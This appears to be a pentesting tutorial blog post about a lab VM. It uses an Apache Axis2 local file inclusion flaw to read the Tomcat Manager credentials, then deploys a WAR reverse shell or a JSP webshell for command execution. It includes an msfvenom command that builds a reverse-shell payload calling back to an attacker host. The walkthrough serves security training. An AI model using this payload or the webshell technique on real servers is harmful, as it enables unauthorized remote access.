Abusing the Tomcat Manager login is done through vulnerabilities or by guessing or brute forcing the credentials, but there is yet another way. The Apache Axis2 web service has an LFI vulnerability that can be exploited to show hidden credentials in configuration files. The relationship between Apache Axis2 and Tomcat Manager is abused to execute commands on the target.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Table of Contents
What You Will Learn
- How to exploit the Axis2 web service
- How to attack the Tomcat Manager service
- Creating a JSP webshell to get command execution
- Exploit Tomcat Manager without using Metasploit
Here’s What You Need
- Axis2 Vulnerable Machine – VirtualBox
- Kali Linux Virtual Machine – VirtualBox
Recon
Kick it off with an nmap scan to identify the running services.
The Tomcat Manager service is running and ssh is listening for connections too.
Exploit Tomcat Manager Without Using Metasploit
The Axis2 web service can be abused to reveal passwords found in configuration files on the server.
Upload WAR File
This is a nonstaged payload which means you only need netcat to catch a shell back.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.250 LPORT=1234 -f war > shell.war
To execute the webshell either visit the context path or click on the /warshell link found in the tomcat manager admin console.
Upload A JSP Webshell
Get a jsp webshell from Github and put it in a file named jspwebshell.jsp and then archive it to a .war file.
Check to verify that the webshell is deployed on the server.
Now I have remote command execution using the newly uploaded webshell.
Exploit Using Metasploit
With credentials now found I can use Metasploit to get a meterpreter session open on the target.
Now I have an additional way of executing commands on the target.